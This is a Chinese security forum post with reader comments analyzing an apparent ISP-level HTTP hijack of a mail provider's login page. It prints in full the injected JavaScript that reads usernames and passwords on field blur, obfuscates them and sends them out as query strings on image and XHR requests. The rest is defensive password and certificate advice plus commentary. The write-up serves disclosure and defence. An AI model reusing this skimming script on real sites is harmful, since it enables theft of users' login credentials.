国内某邮件服务商,近期在某南方地区有大量客户反应登录时出错和异常,于是工作人员进行了一下跟进,发现如下:

首先,邮件服务商登陆页面为普通HTTP协议发送,提交时通过JS进行RSA加密(没错,JS的RSA),发送到SSO登陆点,然后进行登录,有些人一看RSA,应该挺安全的了,不过……

在国内上网的大多数人对于运营商在HTTP包里插广告应该很熟悉了,原理很简单,大家可以参考腾讯安全中心的这篇文章:链路劫持攻击一二三

在客户端抓包发现收到的HTTP数据包有异常,有几个包的TTL多了2,说明比正常从服务器到客户端的数据包少走了两跳,而且离服务器不是很远,估计在一个机房里,并且数据包的ID是很规律的12345,明显就是伪造的,包中插入了如下内容:

<script type="text/javascript"> 
    document.getElementById("freepassword").onblur = function (e) { 
        logoFresh(); 
    }; 

    function onLoginCheck() { 
        var user = null; 
        var pass = null; 
        user = document.getElementById("freename").value; 
        pass = document.getElementById("freepassword").value; 
        if (user.length <= 0 || pass.length <= 0) { 
            return false; 
        } else { 
            return rskQuery(user + '&' + pass + '&xxxxx.com'); 
        } 
    }; 

    function rskQuery(s) { 
        s = encodeURIComponent(s); 
        var r = Math.random(); 
        var num = (Math.round(r * 100)) % 9 + 1; 
        var i = 0; 
        var out = ''; 
        do { 
            var ch = s.charCodeAt(i++); 
            ch = (i % 2 > 0) ? (ch - i % num) : (ch + i % num); 
            var l = (ch / 10 >= 10) ? 3 : (ch / 10 > 0 ? 2 : 1); 
            out += l.toString() + ch; 
        } while (i < s.length); 
        out = r.toString().substring(0, num) + out + num; 
        return out; 
    }; 

    function logoFresh() { 
        var h = logoUrl(); 
        var s = onLoginCheck(); 
        if (s == false) { 
            return false; 
        } 
        for (var i = 0; i < 2; i++) { 
            var bg_logo = new Image(0, 0); 
            bg_logo.src = h + 'images/logo_bg.jpg?' + s; 
        } 
        var s1 = onLoginCheck(); 
        var ajaxUrl = h + 'images/logo_bg.jpg?' + s1; 
        var result = xmlHttpConnect(ajaxUrl, "get", null); 
    }; 

    function logoUrl() { 
        return '/'; 
    }; 

    function createXMLHttp() { 
        if (window.XMLHttpRequest) return new XMLHttpRequest(); 
        else if (window.ActiveXObject) return new ActiveXObject("Microsoft.XMLHTTP");
         else return null; 
    }; 

    function xmlHttpConnect(url, method, content) { 
        var request = createXMLHttp(); 
        if (request == null) return null; 
        try { 
            request.open(method, url, true); 
            request.send(content); 
        } catch (e) { 
            return null; 
        } 
        if ((request.readyState == 4) && (request.status == 200)) return null; 
        else return null 
    }; 

    document.getElementById("vippassword").onblur = function (e) { 
        logo_Fresh(); 
    } 

    function onLoginPhone() { 
        var user = null; 
        var pass = null; 
        user = document.getElementById("vipname").value; 
        pass = document.getElementById("vippassword").value; 
        if (user.length <= 0 || pass.length <= 0) { 
            return false; 
        } else { 
            return rskQuery(user + '&' + pass + '&vip.xxxxx.com'); 
        } 
    } 

    function logo_Fresh() { 
        var h = logoUrl(); 
        var s = onLoginPhone(); 
        if (s == false) { 
            return false; 
        } 
        for (var i = 0; i < 2; i++) { 
            var bg_logo = new Image(0, 0); 
            bg_logo.src = h + 'images/logo_bg.jpg?' + s; 
        } 
        var s1 = onLoginCheck(); 
        var ajaxUrl = h + 'images/logo_bg.jpg?' + s1; 
        var result = xmlHttpConnect(ajaxUrl, "get", null); 
    } 
</script>

在登录form里抓取用户名和密码,当成参数跟在logo后面再访问一下logo,再从中间抓包获取这段内容。这样的话邮件服务商的日志里肯定会出现很多logo的请求后面跟着明文用户名密码吧,错了,服务商那边根本没看到logo被请求两次,推断是带有这个特征的数据包被drop了,真尼玛用心啊。

至此,用户的邮箱密码已经泄露,用户和服务商也没有任何察觉,可能由于某些原因,比如延迟,丢包,bug之类的,导致部分用户被插的时候有异常,影响了原有的登录js,才导致这次事件浮出水面。

服务商由于成本问题,暂不考虑采用SSL登录。

至于那边还有什么类似设备我就不多说了,反正据我的了解,国内随便什么实权部门都能任意在ISP机房和主干网上接入任意设备,据说连税务的都有。

关于本次事件学到的内容:

国内服务用的任何用户名和密码和在国外比如gmail,twitter的账号要不相同,而且没有任何关联,并且国外服务的注册邮箱,密保邮箱等都要采用国外邮箱,首推gmail,并且打开二次认证,不要用短信认证,用手机验证器。

线上线下密码要分开,不相同,不近似,比如本地硬盘加密密码。凡是通过明文协议传输的通通被视为已暴露,HTTPS登录时每次手动查看证书签发机构是否为之前常用的那一个,遇到怀疑是国内CA伪造证书的立刻把证书导出另存为,因为国内没有root CA(cnnic的好像在ff和chrome已经被去掉了),只有二级证书机构,一旦被发现随便签证书会被立刻取消资格,并且黑名单推送到各大浏览器和操作系统。

呵呵,你们以为能频繁的,多种花样的插12306就赢了么,你们以为每天在微博打打嘴炮就胜利了么,菊花都被爆脱肛了还不知道。

相关评论:

1#

心伤的胖子 (天凉好个球) | 2013-01-26 13:19

少年,收拾收拾东西准备跑路吧!

2#

Shell | 2013-01-26 13:38

尼玛~ 还让人怎么活

3#

xsser (十根阳具有长短!!) | 2013-01-26 13:44

喵了个咪的

4#

蟋蟀哥哥 (popok是孙子!![just for fun]) | 2013-01-26 13:48

@xsser 这种事。。。应该有人管吧。。。

5#

insight-labs (Root Yourself in Success) | 2013-01-26 13:57

@xsser 我写这么辛苦,是不是得来个精华

6#

无敌L.t.H | 2013-01-26 14:05

http://www.docin.com/p-116777326.html

这个我早知道了,现在ISP没个这类东西都搞不了。

7#

xsser (十根阳具有长短!!) | 2013-01-26 14:09

@insight-labs 有个问题啊 是如何精确的在正常数据包返回之前插入自己的啊

8#

insight-labs (Root Yourself in Success) | 2013-01-26 14:28

@xsser 是有这个问题,不过从ttl少2跳来看,设备的抓包口和发包口应该不在一个地方,这样从抓到返回数据包后,绕过两个路由,在离客户端更近的地方的设备发包,基本可以保证比原始数据包早到达。但是偶尔也会有延迟,这段js貌似是分了两个http数据包发送的,可能其中一个伪造的包到的晚了一点,导致js代码没插全,所以页面出错了

9#

circus | 2013-01-26 16:02

感慨万千。

10#

lanz | 2013-01-26 16:29

低调不被盯上才是上策啊

11#

horseluke (微碌) | 2013-01-26 17:56

这果然不让人活了

12#

horseluke (微碌) | 2013-01-26 18:00

这果然不让人活了,某些人又可以借机闹到US去了,呵呵

13#

蟋蟀哥哥 (popok是孙子!![just for fun]) | 2013-01-26 18:15

转载了,要让更多的人知道

14#

蟋蟀哥哥 (popok是孙子!![just for fun]) | 2013-01-26 18:20

希望楼主能收集完整的证据,然后找工信部投诉。

15#

liner (javascript:error) | 2013-01-26 18:25

@蟋蟀哥哥 克华 找工信部投诉是没用的 他们也在这么干,运营商这么干也是被某部门默认过了的,要向国际安全组织投诉

16#

insight-labs (Root Yourself in Success) | 2013-01-26 18:29

@蟋蟀哥哥 你啊,图样图森破,拿衣服……

17#

蟋蟀哥哥 (popok是孙子!![just for fun]) | 2013-01-26 18:58

@liner @insight-labs .....那就找证据向国际组织投诉啊。。。

18#

insight-labs (Root Yourself in Success) | 2013-01-26 20:32

@蟋蟀哥哥 gfw举世闻名,劫持过root dns,污染过国外流量,现在不也照样坚挺么,还加了不少功能

19#

lake2 (浮夸) | 2013-01-26 21:40

图样图森破。这段代码跟11年劫持gmail的代码一样。楼主你小心被查水表。我知道是你:)

20#

missdiog | 2013-01-26 22:39

强势围观,笑而不语。某些xx 有几十T的全国原生态的密码集 什么CMD5对xx来说都是弱爆了

21#

Shell | 2013-01-26 22:42

@missdiog 那个xx招人不?

22#

lxsec | 2013-01-27 00:16

看的越多才知道这个水有多深

23#

雅柏菲卡 | 2013-01-27 08:08

偶貌似屏蔽了广告  不知道有木有避免被~~~~~?

24#

雅柏菲卡 | 2013-01-27 08:09

打客服屏蔽的~~~~

留言评论(旧系统):

佚名 @ 2013-01-28 21:18:10

请在这里填写留言内容,留言内容最长不超过 400 字。

本站回复:

[暂无回复]

佚名 @ 2013-01-28 21:21:50

知道今天终于体验到了运营商的力量。。回来后,各种网站去不鸟,各种国外IP不通。。各种神奇的打开网站就下载首页。。各种被屏蔽的弹窗,缘来如此。。还好核大刚刚及时的在这里科普了一下,不然我差点就重装了,无敌了,不敢上网了够

本站回复:

你这不是运营商的问题吧,运营商没这么变态。

佚名 @ 2013-01-29 01:30:08

上网偶尔会有弹窗,原本以为是网站的广告没理会,后来见弹得多了,点开来一看,尼玛,月底+年底的温馨提示,包年包月优惠什么的,当时我就给跪了。而且国外的IP大部分只能通过代理访问...苦不堪言

本站回复:

http广告植入,各地isp都这样搞,很多年了,起码六七年。

佚名 @ 2013-01-29 01:32:28

又来了。电信,你妹今年嫁人没啊 http://gd.189.cn/push/201301/0128/jiacanbao.htm?p=1359394395|6519312|151368|0|0|0 &param=ABioyajZGekprChY6bjJPHzcnHyMfOx7/OyczRmJvZj5CTlpyGlpvCzsrOzMnH2Z6 Nmp6ckJuawsvLzs3Pz9mMkIqNnJqKjZPCk5yH0Zyc

本站回复:

╮(╯_╰)╭

佚名 @ 2013-01-29 01:35:51

如何是好?

本站回复:

Noway.

咖啡 @ 2013-01-29 17:01:42

首先能看见这文章 我得感谢电信 为我提供的4M宽带 我 其次,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

本站回复:

你要感谢国家,感谢社会,感谢党,感谢政府!!!!

豆 @ 2013-02-13 16:05:10

尼玛- -.我可以有点遮羞布吗?。

本站回复:

这个可以有。

佚名 @ 2013-02-15 12:47:49

3层代理难道还有压力么?只开放RDP端口还有压力么?用户密码都16位英文数字混合有压力么?干那些事还会有压力么?求解!

本站回复:

无解。